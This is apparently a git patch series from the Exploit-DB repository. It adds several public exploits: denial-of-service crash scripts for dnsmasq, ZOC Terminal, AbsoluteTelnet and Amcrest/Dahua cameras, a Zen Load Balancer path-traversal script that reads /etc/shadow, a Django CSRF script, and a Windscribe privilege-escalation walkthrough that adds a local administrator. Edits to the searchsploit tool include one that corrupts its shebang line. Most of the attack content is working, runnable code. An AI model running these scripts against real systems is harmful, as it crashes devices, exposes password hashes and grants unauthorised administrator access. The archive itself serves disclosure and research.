48269,exploits/windows/dos/48269.py,"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)",2020-03-31,"Paras Bhatia",dos,windows, 48276,exploits/windows/dos/48276.py,"DiskBoss 7.7.14 - Denial of Service (PoC)",2020-04-01,"Paras Bhatia",dos,windows, +48284,exploits/windows/dos/48284.py,"Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48285,exploits/windows/dos/48285.py,"SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48286,exploits/windows/dos/48286.py,"Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)",2020-04-06,0xMoHassan,dos,windows, +48287,exploits/windows/dos/48287.py,"Frigate 3.36 - Denial of Service (PoC)",2020-04-06,inter,dos,windows, +48288,exploits/windows/dos/48288.py,"UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11011,6 +11019,9 @@ id,file,description,date,author,type,platform,port 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows, 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows, 48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows, +48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows, +48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, +48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42526,3 +42537,9 @@ id,file,description,date,author,type,platform,port 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware, 48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php, +48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php, +48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple, +48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple, +48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, +48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, +48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, From 36c65f8dd4df875987b37b467d7a03df7dd163ba Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 8 Apr 2020 05:01:50 +0000 Subject: [PATCH 03/18] DB: 2020-04-08 2 changes to exploits/shellcodes dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) --- exploits/linux/dos/48301.py | 38 +++++++++++++++++++++++++++++++++++ exploits/windows/dos/48302.py | 21 +++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 61 insertions(+) create mode 100755 exploits/linux/dos/48301.py create mode 100755 exploits/windows/dos/48302.py diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py new file mode 100755 index 000000000..aa6146124 --- /dev/null +++ b/exploits/linux/dos/48301.py @@ -0,0 +1,38 @@ +# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) +# Date: 2020-04-06 +# Exploit Author: Josue Encinar +# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 +# Version: 2.79 +# Tested on: Ubuntu 18.04 + + +from subprocess import Popen, PIPE + +data = "" +bof = False +for i in range (1, 200): + A = "A"*i + data = f"dhcp_release {A} 1 1" + try: + result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) + error = result.stderr.read().decode() + if "Aborted (core dumped)" in error: + print("[+] Buffer Overflow detected!") + print(f"[*] Offset: {i}") + bof = True + break + except Exception as e: + print(f"[-] {e}") + +if not bof: + print("[-] No buffer overflow...") + + +## Check line 273 in dhcp_release.c +### strcpy(ifr.ifr_name, argv[1]); +# +## PoC: +# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py +# *** buffer overflow detected ***: dhcp_release terminated +# [+] Buffer Overflow detected! +# [*] Offset: 16 \ No newline at end of file diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py new file mode 100755 index 000000000..1f658e2bd --- /dev/null +++ b/exploits/windows/dos/48302.py @@ -0,0 +1,21 @@ +# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-04-05 +# Vendor Homepage: https://www.emtec.com +# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe +# Tested Version: 7.25.5 +# Vulnerability Type: Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx" +# 2.- Open ZOC Terminal +# 3.- Select Script > Start REXX Script... +# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open" +# 5.- Crashed + +cod = "\x41" * 20000 + +f = open('ZOC_7.25.5_Script.zrx', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ebfba676e..0e71d3f74 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port 48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, 48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows, +48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux, +48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, From 6d55b45cdfc364cb6b2787cc9acc1dc726e3ce9c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 9 Apr 2020 05:01:51 +0000 Subject: [PATCH 04/18] DB: 2020-04-09 2 changes to exploits/shellcodes Django 3.0 - Cross-Site Request Forgery Token Bypass Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) --- exploits/hardware/webapps/48304.py | 153 +++++++++++++++++++++++++++++ exploits/php/webapps/48303.txt | 111 +++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 266 insertions(+) create mode 100755 exploits/hardware/webapps/48304.py create mode 100644 exploits/php/webapps/48303.txt diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py new file mode 100755 index 000000000..b73eb9ca5 --- /dev/null +++ b/exploits/hardware/webapps/48304.py @@ -0,0 +1,153 @@ +# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) +# Date: 2020-04-07 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://amcrest.com/ +# Software Link: https://amcrest.com/firmwaredownloads +# Version: Many different versions due to number of Dahua/Amcrest/etc +# devices affected +# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 +# 4.000.00AC000.0 +# CVE : CVE-2020-5735 +# Advisory: https://www.tenable.com/security/research/tra-2020-20 +# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash + +import argparse +import hashlib +import socket +import struct +import sys +import md5 +import re + +## DDNS test functionality. Stack overflow via memcpy + +def recv_response(sock): + # minimum size is 32 bytes + header = sock.recv(32) + + # check we received enough data + if len(header) != 32: + print 'Invalid response. Too short' + return (False, '', '') + + # extract the payload length field + length_field = header[4:8] + payload_length = struct.unpack_from('I', length_field) + payload_length = payload_length[0] + + # uhm... lets be restrictive of accepted lengths + if payload_length < 0 or payload_length > 4096: + print 'Invalid response. Bad payload length' + return (False, header, '') + + if (payload_length == 0): + return (True, header, '') + + payload = sock.recv(payload_length) + if len(payload) != payload_length: + print 'Invalid response. Bad received length' + return (False, header, payload) + + return (True, header, payload) + +def sofia_hash(msg): + h = "" + m = hashlib.md5() + m.update(msg) + msg_md5 = m.digest() + for i in range(8): + n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e + if n > 9: + if n > 35: + n += 61 + else: + n += 55 + else: + n += 0x30 + h += chr(n) + return h + +top_parser = argparse.ArgumentParser(description='lol') +top_parser.add_argument('-i', '--ip', action="store", dest="ip", +required=True, help="The IPv4 address to connect to") +top_parser.add_argument('-p', '--port', action="store", dest="port", +type=int, help="The port to connect to", default="37777") +top_parser.add_argument('-u', '--username', action="store", +dest="username", help="The user to login as", default="admin") +top_parser.add_argument('--pass', action="store", dest="password", +required=True, help="The password to use") +args = top_parser.parse_args() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + args.ip + ":" + str(args.port) +sock.connect((args.ip, args.port)) +print "[+] Connected!" + +# send the old style login request. We'll use blank hashes. This should +# trigger a challenge from new versions of the camera +old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash + "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash + "\x05\x02\x00\x01\x00\x00\xa1\xaa") +sock.sendall(old_login) +(success, header, challenge) = recv_response(sock) +if success == False or not challenge: + print 'Failed to receive the challenge' + print challenge + sys.exit(0) + +# extract the realm and random seed +seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", +challenge) +if seeds == None: + print 'Failed to extract realm and random seed.' + print challenge + sys.exit(0) + +realm = seeds.group(1) +random = seeds.group(2) + +# compute the response +realm_hash = md5.new(args.username + ":" + realm + ":" + +args.password).hexdigest().upper() +random_hash = md5.new(args.username + ":" + random + ":" + +realm_hash).hexdigest().upper() +sofia_result = sofia_hash(args.password) +final_hash = md5.new(args.username + ":" + random + ":" + +sofia_result).hexdigest().upper() + +challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + + args.username + "&&" + random_hash + final_hash) +sock.sendall(challenge_resp) + +(success, header, payload) = recv_response(sock) +if success == False or not header: + print 'Failed to receive the session id' + sys.exit(0) + +session_id_bin = header[16:20] +session_id_int = struct.unpack_from('I', session_id_bin) +if session_id_int[0] == 0: + print "Log in failed." + sys.exit(0) + +session_id = session_id_int[0] +print "[+] Session ID: " + str(session_id) + +# firmware version +command = "Protocol: " + ("a" * 0x300) + "\r\n" +command_length = struct.pack("I", len(command)) +firmware = ("\x62\x00\x00\x00" + command_length + + "\x04\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + command) +sock.sendall(firmware) +(success, header, firmware_string) = recv_response(sock) +if success == False and not header: + print "[!] Probably crashed the server." +else: + print "[+] Attack failed." \ No newline at end of file diff --git a/exploits/php/webapps/48303.txt b/exploits/php/webapps/48303.txt new file mode 100644 index 000000000..d15f6555f --- /dev/null +++ b/exploits/php/webapps/48303.txt @@ -0,0 +1,111 @@ +# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass +# Date: 2020-04-08 +# Exploit Author: Spad Security Group +# Vendor Homepage: https://www.djangoproject.com/ +# Software Link: https://pypi.org/project/Django/ +# Version: 3.0 =< +# Tested on: windows 10 +# Language: python3.8 + +# t.me/SpadSec +# Spad Security Group + + +from requests import Session +import sys +from bs4 import BeautifulSoup +from time import sleep +from colorama import Fore, Style +from random import choice +from os import name, system + +colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] + + +def cleaner(): + if name == "nt": + system("cls") + else: + system("clear") + +def logo_printer(): + cleaner() + logo = r""" + \_______/ + `.,-'\_____/`-.,' + /`..'\ _ /`.,'\ + / /`.,' `.,'\ \ +/__/__/ \__\__\__ +\ \ \ / / / + \ \,'`._,'`./ / + \,'`./___\,'`./ + ,'`-./_____\,-'`. + / \ + """ + _logo_enumer = 0 + for char in logo: + sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") + sys.stdout.flush() + _logo_enumer +=1 + sleep(0.005) + print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") + +class DjangoCsrfMiddleWareBypass: + def __init__(self, url: str, username: str, password: str): + self.url = url + self.username = username + self.password = password + logo_printer() + self.cookies = {} + self.session = Session() + self.bypass() + + def spad_printer(self, string): + print("\n") + for char in string: + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) + + def bypass(self): + global colors + _conn = self.session.get(self.url) + self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") + for key, value in _conn.cookies.items(): + self.cookies[key] = value + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!") + + soup = BeautifulSoup(_conn.text, "lxml") + csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] + self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") + + login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) + if len(login.history) >= 2: + if login.history[1].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") + else: + self.spad_printer("[-] Error") + else: + if login.history: + if login.history[0].is_redirect: + self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") + for key, value in self.session.cookies.items(): + self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + else: + self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") + +if __name__ == "__main__": + try: + url = sys.argv[1] + username = sys.argv[2] + password = sys.argv[3] + DjangoCsrfMiddleWareBypass(url, username, password) + except IndexError: + logo_printer() + for char in f"[!] python {sys.argv[0]} http://google.com username password": + sys.stdout.write(char) + sys.stdout.flush() + sleep(0.05) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0e71d3f74..600baaeaa 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42545,3 +42545,5 @@ id,file,description,date,author,type,platform,port 48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php, 48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php, 48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd, +48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, +48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, From 37ed20a3b9bcfc7070f21de023c3e3d294f48207 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 9 Apr 2020 12:10:00 +0100 Subject: [PATCH 05/18] Fix a few grammar mistakes --- searchsploit | 39 +++++++++++++++++++++++---------------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/searchsploit b/searchsploit index 07e505173..895aca470 100755 --- a/searchsploit +++ b/searchsploit @@ -1,6 +1,6 @@ #!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool -# Version: 4.0.6 (2020-04-06) +# Version: 4.0.7 (2020-04-09) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k # Homepage: https://github.com/offensive-security/exploitdb # Manual: https://www.exploit-db.com/searchsploit @@ -264,7 +264,7 @@ function validterm() || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "oracle" ] \ || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "ssh" ] \ || [ "$( echo ${1} | tr '[:upper:]' '[:lower:]' )" == "unknown" ]; then - echo -e "[-] Skipping term: ${1} (Term is too general. Please re-search manually: $0 ${arg} ${1})\n" 1>&2 + echo -e "[-] Skipping term: ${1} (Too generic. You'll need to force a search: $0 ${arg} ${1})\n" 1>&2 ## Issues, return with something return 1 fi @@ -299,7 +299,7 @@ function searchsploitout() tmp="" for word in $( echo ${software} ); do ## Add current search term on - tmp="${tmp}${word} " + tmp="${tmp}${word}" ## Check to see if its any phrases which would give a TON of incorrect results validterm "${tmp}" \ @@ -312,14 +312,18 @@ function searchsploitout() ## Are there too many result? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${tmp} (Too many results. Please re-search manually: $0 ${arg} ${tmp})\n" 1>&2 + echo -e "[-] Skipping output: ${tmp} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2 ## Are there any result? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" ## If there's no results else + ## Exit for loop break fi + + ## Space out for the next word + tmp="${tmp} " done ## Padding between loops @@ -336,7 +340,7 @@ function searchsploitout() ## Are there too many result? lines=$( echo -e "${out}" | wc -l ) if [[ "${lines}" -gt 100 ]]; then - echo -e "[-] Skipping output: ${software} (Too many results. Please re-search manually: $0 ${arg} ${software})\n" 1>&2 + echo -e "[-] Skipping output: ${software} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2 ## Are there any result? elif [[ "${lines}" -gt 5 ]]; then echo -e "${out}\n\n" @@ -492,8 +496,9 @@ function findresults() ## Maximum length COL2 can be FORMAT_COL2=$(( ${COL2} - 2 )) - ## Strip un-wanted values - SEARCH="${SEARCH} | sed 's/\"//g'" + ## Strip un-wanted values from titles + #SEARCH="${SEARCH} | sed 's/\"//g" + SEARCH="${SEARCH} | sed 's/,\"/,/; s/\"$//;'" ## Remove any terms not wanted from the search @@ -532,9 +537,11 @@ function findresults() | sort )" ## Default view else + echo $SEARCH OUTPUT="$( eval ${SEARCH} \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort )" + #| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ fi @@ -550,7 +557,7 @@ function printresults() { title_in="${1}" path_in="${2}" - json_title="$(echo ${title_in} | tr /a-z/ /A-Z/)" + json_title="$( echo ${title_in} | tr /a-z/ /A-Z/ )" ## Print header if in JSON ("--json") @@ -709,16 +716,16 @@ for (( i=0; i<${arraylength}; i++ )); do if [[ -f "${files}" ]]; then continue ## Method #1 - File itself - elif [[ -f "$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/${files_array[${i}]}" ]]; then - echo "[i] Found (#1): $(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)/${files_array[${i}]}" + elif [[ -f "$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" ]]; then + echo "[i] Found (#1): $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/${files_array[${i}]}" echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" - path_array[${i}]="$(cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd)" + path_array[${i}]="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" echo ## Method #2 - Symbolic link - elif [[ -f "$(dirname "$(readlink "$0")")/${files_array[${i}]}" ]]; then - echo "[i] Found (#2): $(dirname "$(readlink "$0")")/${files_array[${i}]}" + elif [[ -f "$( dirname "$( readlink "$0" )" )/${files_array[${i}]}" ]]; then + echo "[i] Found (#2): $( dirname "$( readlink "$0" )" )/${files_array[${i}]}" echo "[i] To remove this message, please edit \"${rc_file}\" for \"${files_array[${i}]}\" (package_array: ${package_array[${i}]})" - path_array[${i}]="$(dirname "$(readlink "$0")")" + path_array[${i}]="$( dirname "$( readlink "$0" )" )" echo else #echo "[!] Could not find: ${files}" @@ -804,7 +811,7 @@ if [[ "${GETPATH}" -eq 1 ]]; then title=$( grep -m 1 "${path}" "${files}" | cut -d ',' -f 3 | sed 's/"//g' ) ## File type - fileinfo="$(file -b "${location}")" + fileinfo="$( file -b "${location}" )" ## How long is the name? PADDING=$(( 9 - ${#name} )) @@ -904,7 +911,7 @@ for (( i=0; i<${arraylength}; i++ )); do printresults "${name_array[${i}]}" "${path_array[${i}]}" ## Summary if NOT JSON ("--json") elif [[ "${JSON}" -eq 0 ]]; then - echo "${name_array[${i}]}s: No Result" + echo "${name_array[${i}]}s: No Results" fi ## Reset COLOUR_TAG="" From 0f8df71e728a17276d17a68c340f1a76879e5612 Mon Sep 17 00:00:00 2001 From: g0tmi1k <535942+g0tmi1k@users.noreply.github.com> Date: Thu, 9 Apr 2020 12:22:20 +0100 Subject: [PATCH 06/18] Remove debug command Remove debug command --- searchsploit | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/searchsploit b/searchsploit index 00d7c519b..4de856bf8 100755 --- a/searchsploit +++ b/searchsploit @@ -1,4 +1,4 @@ -#!/bin/bash +ech#!/bin/bash # Name: SearchSploit - Exploit-DB's CLI search tool # Version: 4.0.7 (2020-04-09) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k @@ -538,7 +538,6 @@ function findresults() | sort )" ## Default view else - echo $SEARCH OUTPUT="$( eval ${SEARCH} \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort )" From 4ee0ce31e79e35784c8556e6e44b402cbc2dab3c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 11 Apr 2020 05:01:50 +0000 Subject: [PATCH 07/18] DB: 2020-04-11 3 changes to exploits/shellcodes AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) Windscribe 1.83 - 'WindscribeService' Unquoted Service Path Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal --- exploits/cgi/webapps/48308.py | 31 +++++++++++++++++++ exploits/windows/dos/48305.py | 22 ++++++++++++++ exploits/windows/local/48306.txt | 52 ++++++++++++++++++++++++++++++++ files_exploits.csv | 3 ++ 4 files changed, 108 insertions(+) create mode 100755 exploits/cgi/webapps/48308.py create mode 100755 exploits/windows/dos/48305.py create mode 100644 exploits/windows/local/48306.txt diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py new file mode 100755 index 000000000..5ce0b9588 --- /dev/null +++ b/exploits/cgi/webapps/48308.py @@ -0,0 +1,31 @@ +# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal +# Date: 2020-04-10 +# Exploit Author: Basim Alabdullah +# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download +# Version: 3.10.1 +# Tested on: Debian8u2 +# +# Technical Details: +# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. +# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. +# Note that disclosure of the shadow file may allow an attacker to discover users' passwords +# +# Impact: +# -------- +# Successful exploitation could allow an attacker to obtain sensitive +# information. + +import requests +import sys + +if len(sys.argv) <2: + print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") + sys.exit(-1) +else: + files=sys.argv[2] + url=sys.argv[1] + with requests.session() as s: + urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" + response = s.get(urlz, auth=('admin', 'admin'), verify=False) + txt=response.text + print(response.text) \ No newline at end of file diff --git a/exploits/windows/dos/48305.py b/exploits/windows/dos/48305.py new file mode 100755 index 000000000..0771d435c --- /dev/null +++ b/exploits/windows/dos/48305.py @@ -0,0 +1,22 @@ +# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2020-05-02 +# Vendor Homepage: https://www.celestialsoftware.net/ +# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe +# Tested Version: 11.12 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to produce the crash: +# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py +# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard +# 3.- Open AbsoluteTelnet +# 4.- Select "new connection file", "Connection", "SSH1", "Use last username" +# 5.- In "username" field paste Clipboard +# 6.- Select "OK" +# 7.- Crashed + +buffer = "\x41" * 1000 +f = open ("absolutetelnet_username_SSH1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt new file mode 100644 index 000000000..5f1850679 --- /dev/null +++ b/exploits/windows/local/48306.txt @@ -0,0 +1,52 @@ +# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path +# Date: 2020-04-10 +# Exploit Author: MgThuraMoeMyint +# Vendor Homepage: https://windscribe.com +# Version: v1.83 Build 20 +# Tested on: Windows 10, version 1909 + +In windscribe v1.83 , there is a service via windscribe that every +authenticated user can modify. + +C:\Users\mgthura>sc qc WindscribeService +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: WindscribeService +TYPE : 10 WIN32_OWN_PROCESS +START_TYPE : 2 AUTO_START +ERROR_CONTROL : 1 NORMAL +BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe +LOAD_ORDER_GROUP : +TAG : 0 +DISPLAY_NAME : WindscribeService +DEPENDENCIES : +SERVICE_START_NAME : LocalSystem + +That shows that running as Local System this means that the +BINARY_PATH_NAME parameter can be modified to execute any command on +the system. +I'll change binary_path_name with a command that add a user to +administrators group , so it will be + +C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup +administrators pentest /add" +[SC] ChangeServiceConfig SUCCESS + +C:\Users\mgthura>sc stop WindscribeService + +SERVICE_NAME: WindscribeService +TYPE : 10 WIN32_OWN_PROCESS +STATE : 3 